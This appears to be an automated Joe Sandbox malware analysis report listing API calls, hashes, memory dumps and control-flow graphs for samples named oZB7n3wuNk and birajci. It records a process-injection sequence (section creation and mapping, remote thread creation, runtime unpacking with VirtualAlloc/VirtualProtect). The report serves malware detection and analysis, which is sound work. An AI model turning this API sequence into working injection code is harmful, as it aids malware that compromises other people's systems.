                                                    • Opcode ID: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                    • Instruction ID: 2ebc05d28c21af2a54c4caf66b99915bed587d393384b69dc5fa06e125dea622
                                                    • Opcode Fuzzy Hash: 60e6b54977058768ad97221ce1a21881eac0b699f264f3939cedf6f5eedf2412
                                                    • Instruction Fuzzy Hash: 50018F7260C205EBEB01AA909C41A7E3315AB45311F208437BA06790F1C67D8712F71B
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                    • Instruction ID: 055aca88afb56c34d21ecc05ae408393a65145e0cd4b89ba36dd333808a7ed44
                                                    • Opcode Fuzzy Hash: 3aa88ae79591668d5f45020df35a97080ef95a9b76e1d5ec1d9a291b84300a95
                                                    • Instruction Fuzzy Hash: C401627260C205EBEB01AA909D51A6E3355AF45351F208437BA16790F1C67D8652F71B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$GetProcAddress.$l
                                                    • API String ID: 0-2784972518
                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction ID: 25832fa1444af66ef1e743b70733ccc99ec660d3ec924cc2d2e4fc63a549f9ad
                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                    • Instruction Fuzzy Hash: C4318AB6900609CFEB10CF99C884AAEBBF9FF49324F24454AD841A7311D775EA45CFA4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
                                                    • Instruction ID: 00aa4fa33964227ee3dc02f85a46043d3a2d6d664641a7a3abe33854cfa6e656
                                                    • Opcode Fuzzy Hash: f3ef201b7eb768e6bc6555ba41f306de6eccaabbf2ee15fcfb797bfe8dfe952b
                                                    • Instruction Fuzzy Hash: 092134728982409EDF959FB4C9870C27F72BE133387B007ECC0618B262CAA69113CB52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction ID: e0c5cbf72aecf7d9416b0ac41df33178dc0324b0c199ca3d9e7d9fef97eac854
                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                    • Instruction Fuzzy Hash: B1117072780100AFD744DE95DD91EA673EAEB88330B298165E904CB315E675EC02C760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                    • Instruction ID: ac47c9089ab74bbd4744f5430c59f4e61b9adfdf7c8bba648fb7bf2dae8000a3
                                                    • Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                    • Instruction Fuzzy Hash: 10115A2049D3C05BC3878B7CD595483BFA47D1B230B5A55EED8C24F963C394A925D3A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                    • Instruction ID: 2c9ce2d070023683a66063f9f5ef25a42d674bd8abd2ac0316e7f96e4d8d34cf
                                                    • Opcode Fuzzy Hash: b86c188fbef5a266fc37cc60ac139e4e782a8b2fe3696e3507bbfbd803dcd64f
                                                    • Instruction Fuzzy Hash: AD11482049D3C05BD3838B7CD295483BF647E4B230B9A96EED8C14F913C345A915D3A3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                    • Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
                                                    • Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                    • Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                    • Instruction ID: c6b7842e347cac63059ed32f1a386f80ec7c31cd39de27a6132647ed699d03ea
                                                    • Opcode Fuzzy Hash: 07059c36e365a46d4639ff0a6b148d38c51052ebc1ed0806d06bd20b9de087b1
                                                    • Instruction Fuzzy Hash: BE019D0526E3D81AC3878B7DC1895877F017D5B13079BA2EEECC18E823C380884AC763
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction ID: d5d320989883a75441cc4847dc7e3c057b311ac91c638186312ac6d0dcdec9a6
                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                    • Instruction Fuzzy Hash: 4801A277B016049FDF21DF64C804BAA33E5FBC7316F454AA9D90A97282E778AD418BD0

                                                    Execution Graph

                                                    Execution Coverage:9.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:117
                                                    Total number of Limit Nodes:2
                                                    execution_graph 3231 402ee1 3232 402e69 3231->3232 3233 402e9c 3231->3233 3234 401869 8 API calls 3232->3234 3234->3233 3193 670005 3198 67092b GetPEB 3193->3198 3195 670030 3200 67003c 3195->3200 3199 670972 3198->3199 3199->3195 3201 670049 3200->3201 3202 670e0f 2 API calls 3201->3202 3203 670223 3202->3203 3204 670d90 GetPEB 3203->3204 3205 670238 VirtualAlloc 3204->3205 3206 670265 3205->3206 3207 6702ce VirtualProtect 3206->3207 3209 67030b 3207->3209 3208 670439 VirtualFree 3212 6704be LoadLibraryA 3208->3212 3209->3208 3211 6708c7 3212->3211 3213 670001 3214 670005 3213->3214 3215 67092b GetPEB 3214->3215 3216 670030 3215->3216 3217 67003c 7 API calls 3216->3217 3218 670038 3217->3218 3300 402d69 3301 402d87 3300->3301 3302 401869 8 API calls 3301->3302 3303 402e9c 3301->3303 3302->3303 3259 4014aa 3260 4014a2 3259->3260 3261 401543 NtDuplicateObject 3260->3261 3270 40165f 3260->3270 3262 401560 NtCreateSection 3261->3262 3261->3270 3263 4015e0 NtCreateSection 3262->3263 3264 401586 NtMapViewOfSection 3262->3264 3266 40160c 3263->3266 3263->3270 3264->3263 3265 4015a9 NtMapViewOfSection 3264->3265 3265->3263 3267 4015c7 3265->3267 3268 401616 NtMapViewOfSection 3266->3268 3266->3270 3267->3263 3269 40163d NtMapViewOfSection 3268->3269 3268->3270 3269->3270 3134 402e0b 3135 402e0e 3134->3135 3137 402e9c 3135->3137 3138 401869 3135->3138 3139 401877 3138->3139 3140 4018af Sleep 3139->3140 3141 4018ca 3140->3141 3143 4018db 3141->3143 3144 401493 3141->3144 3143->3137 3145 4014a2 3144->3145 3146 401543 NtDuplicateObject 3145->3146 3155 40165f 3145->3155 3147 401560 NtCreateSection 3146->3147 3146->3155 3148 4015e0 NtCreateSection 3147->3148 3149 401586 NtMapViewOfSection 3147->3149 3151 40160c 3148->3151 3148->3155 3149->3148 3150 4015a9 NtMapViewOfSection 3149->3150 3150->3148 3152 4015c7 3150->3152 3153 401616 NtMapViewOfSection 3151->3153 3151->3155 3152->3148 3154 40163d NtMapViewOfSection 3153->3154 3153->3155 3154->3155 3155->3143 3295 4030b2 3296 4030c5 3295->3296 3297 403094 NtTerminateProcess 3296->3297 3299 4030d3 3296->3299 3298 4030ac 3297->3298 3175 401874 3176 401899 3175->3176 3177 4018af Sleep 3176->3177 3178 4018ca 3177->3178 3179 401493 7 API calls 3178->3179 3180 4018db 3178->3180 3179->3180 3111 6fa03a 3114 6fa040 3111->3114 3115 6fa04f 3114->3115 3118 6fa7e0 3115->3118 3119 6fa7fb 3118->3119 3120 6fa804 CreateToolhelp32Snapshot 3119->3120 3121 6fa820 Module32First 3119->3121 3120->3119 3120->3121 3122 6fa82f 3121->3122 3123 6fa03f 3121->3123 3125 6fa49f 3122->3125 3126 6fa4ca 3125->3126 3127 6fa4db VirtualAlloc 3126->3127 3128 6fa513 3126->3128 3127->3128 3128->3128 3129 402f55 3130 4030ac 3129->3130 3131 402f7f 3129->3131 3131->3130 3132 40303a RtlCreateUserThread 3131->3132 3133 403094 NtTerminateProcess 3132->3133 3133->3130 3181 401476 3182 401422 3181->3182 3182->3181 3183 401543 NtDuplicateObject 3182->3183 3192 4013c0 3182->3192 3184 401560 NtCreateSection 3183->3184 3183->3192 3185 4015e0 NtCreateSection 3184->3185 3186 401586 NtMapViewOfSection 3184->3186 3188 40160c 3185->3188 3185->3192 3186->3185 3187 4015a9 NtMapViewOfSection 3186->3187 3187->3185 3189 4015c7 3187->3189 3190 401616 NtMapViewOfSection 3188->3190 3188->3192 3189->3185 3191 40163d NtMapViewOfSection 3190->3191 3190->3192 3191->3192 3156 67003c 3157 670049 3156->3157 3169 670e0f SetErrorMode SetErrorMode 3157->3169 3162 670265 3163 6702ce VirtualProtect 3162->3163 3165 67030b 3163->3165 3164 670439 VirtualFree 3168 6704be LoadLibraryA 3164->3168 3165->3164 3167 6708c7 3168->3167 3170 670223 3169->3170 3171 670d90 3170->3171 3172 670dad 3171->3172 3173 670dbb GetPEB 3172->3173 3174 670238 VirtualAlloc 3172->3174 3173->3174 3174->3162

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 85 401476-401478 86 4014c0-4014ed call 40110f 85->86 87 401479-40147a 85->87 101 4014f2-4014f7 86->101 102 4014ef 86->102 89 401422 87->89 90 40147c-401481 87->90 92 4013c0-4013de call 40110f 89->92 93 401424-401451 89->93 94 401483-401490 90->94 104 4013f9-4013fa 92->104 103 401453-401470 93->103 93->104 110 401818-401820 101->110 111 4014fd-40150e 101->111 102->101 103->94 106 401472-401474 103->106 106->85 110->101 114 401825-40184b 110->114 115 401514-40153d 111->115 116 401816 111->116 124 40183c-401847 114->124 125 40184e-401866 call 40110f 114->125 115->116 123 401543-40155a NtDuplicateObject 115->123 116->114 123->116 127 401560-401584 NtCreateSection 123->127 124->125 129 4015e0-401606 NtCreateSection 127->129 130 401586-4015a7 NtMapViewOfSection 127->130 129->116 133 40160c-401610 129->133 130->129 132 4015a9-4015c5 NtMapViewOfSection 130->132 132->129 135 4015c7-4015dd 132->135 133->116 136 401616-401637 NtMapViewOfSection 133->136 135->129 136->116 138 40163d-401659 NtMapViewOfSection 136->138 138->116 140 40165f call 401664 138->140
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$CreateDuplicateObjectView
                                                    • String ID:
                                                    • API String ID: 1652636561-0
                                                    • Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                    • Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
                                                    • Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
                                                    • Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 142 401493-4014c5 149 4014d7 142->149 150 4014cb-4014d3 142->150 149->150 151 4014da-4014ed call 40110f 149->151 150->151 154 4014f2-4014f7 151->154 155 4014ef 151->155 157 401818-401820 154->157 158 4014fd-40150e 154->158 155->154 157->154 161 401825-40184b 157->161 162 401514-40153d 158->162 163 401816 158->163 171 40183c-401847 161->171 172 40184e-401866 call 40110f 161->172 162->163 170 401543-40155a NtDuplicateObject 162->170 163->161 170->163 174 401560-401584 NtCreateSection 170->174 171->172 176 4015e0-401606 NtCreateSection 174->176 177 401586-4015a7 NtMapViewOfSection 174->177 176->163 180 40160c-401610 176->180 177->176 179 4015a9-4015c5 NtMapViewOfSection 177->179 179->176 182 4015c7-4015dd 179->182 180->163 183 401616-401637 NtMapViewOfSection 180->183 182->176 183->163 185 40163d-401659 NtMapViewOfSection 183->185 185->163 187 40165f call 401664 185->187
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                    • Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
                                                    • Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                    • Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 4014aa-4014c5 196 4014d7 189->196 197 4014cb-4014d3 189->197 196->197 198 4014da-4014ed call 40110f 196->198 197->198 201 4014f2-4014f7 198->201 202 4014ef 198->202 204 401818-401820 201->204 205 4014fd-40150e 201->205 202->201 204->201 208 401825-40184b 204->208 209 401514-40153d 205->209 210 401816 205->210 218 40183c-401847 208->218 219 40184e-401866 call 40110f 208->219 209->210 217 401543-40155a NtDuplicateObject 209->217 210->208 217->210 221 401560-401584 NtCreateSection 217->221 218->219 223 4015e0-401606 NtCreateSection 221->223 224 401586-4015a7 NtMapViewOfSection 221->224 223->210 227 40160c-401610 223->227 224->223 226 4015a9-4015c5 NtMapViewOfSection 224->226 226->223 229 4015c7-4015dd 226->229 227->210 230 401616-401637 NtMapViewOfSection 227->230 229->223 230->210 232 40163d-401659 NtMapViewOfSection 230->232 232->210 234 40165f call 401664 232->234
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                    • Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
                                                    • Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                    • Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 236 4014b1-4014ed call 40110f 241 4014f2-4014f7 236->241 242 4014ef 236->242 244 401818-401820 241->244 245 4014fd-40150e 241->245 242->241 244->241 248 401825-40184b 244->248 249 401514-40153d 245->249 250 401816 245->250 258 40183c-401847 248->258 259 40184e-401866 call 40110f 248->259 249->250 257 401543-40155a NtDuplicateObject 249->257 250->248 257->250 261 401560-401584 NtCreateSection 257->261 258->259 263 4015e0-401606 NtCreateSection 261->263 264 401586-4015a7 NtMapViewOfSection 261->264 263->250 267 40160c-401610 263->267 264->263 266 4015a9-4015c5 NtMapViewOfSection 264->266 266->263 269 4015c7-4015dd 266->269 267->250 270 401616-401637 NtMapViewOfSection 267->270 269->263 270->250 272 40163d-401659 NtMapViewOfSection 270->272 272->250 274 40165f call 401664 272->274
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                    • Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
                                                    • Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                    • Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 276 4014ad-4014c5 281 4014d7 276->281 282 4014cb-4014d3 276->282 281->282 283 4014da-4014ed call 40110f 281->283 282->283 286 4014f2-4014f7 283->286 287 4014ef 283->287 289 401818-401820 286->289 290 4014fd-40150e 286->290 287->286 289->286 293 401825-40184b 289->293 294 401514-40153d 290->294 295 401816 290->295 303 40183c-401847 293->303 304 40184e-401866 call 40110f 293->304 294->295 302 401543-40155a NtDuplicateObject 294->302 295->293 302->295 306 401560-401584 NtCreateSection 302->306 303->304 308 4015e0-401606 NtCreateSection 306->308 309 401586-4015a7 NtMapViewOfSection 306->309 308->295 312 40160c-401610 308->312 309->308 311 4015a9-4015c5 NtMapViewOfSection 309->311 311->308 314 4015c7-4015dd 311->314 312->295 315 401616-401637 NtMapViewOfSection 312->315 314->308 315->295 317 40163d-401659 NtMapViewOfSection 315->317 317->295 319 40165f call 401664 317->319
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                    • Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
                                                    • Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                    • Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 321 4014d5-4014ed call 40110f 325 4014f2-4014f7 321->325 326 4014ef 321->326 328 401818-401820 325->328 329 4014fd-40150e 325->329 326->325 328->325 332 401825-40184b 328->332 333 401514-40153d 329->333 334 401816 329->334 342 40183c-401847 332->342 343 40184e-401866 call 40110f 332->343 333->334 341 401543-40155a NtDuplicateObject 333->341 334->332 341->334 345 401560-401584 NtCreateSection 341->345 342->343 347 4015e0-401606 NtCreateSection 345->347 348 401586-4015a7 NtMapViewOfSection 345->348 347->334 351 40160c-401610 347->351 348->347 350 4015a9-4015c5 NtMapViewOfSection 348->350 350->347 353 4015c7-4015dd 350->353 351->334 354 401616-401637 NtMapViewOfSection 351->354 353->347 354->334 356 40163d-401659 NtMapViewOfSection 354->356 356->334 358 40165f call 401664 356->358
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                    • Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
                                                    • Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                    • Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 360 402f55-402f79 361 4030ac-4030b1 360->361 362 402f7f-402f97 360->362 362->361 363 402f9d-402fae 362->363 364 402fb0-402fb9 363->364 365 402fbe-402fcc 364->365 365->365 366 402fce-402fd5 365->366 367 402ff7-402ffe 366->367 368 402fd7-402ff6 366->368 369 403020-403023 367->369 370 403000-40301f 367->370 368->367 371 403025-403028 369->371 372 40302c 369->372 370->369 371->372 373 40302a 371->373 372->364 374 40302e-403033 372->374 373->374 374->361 375 403035-403038 374->375 375->361 376 40303a-4030a9 RtlCreateUserThread NtTerminateProcess 375->376 376->361
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.2403612883.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_birajci.jbxd
                                                    Similarity
                                                    • API ID: CreateProcessTerminateThreadUser
                                                    • String ID:
                                                    • API String ID: 1921587553-0
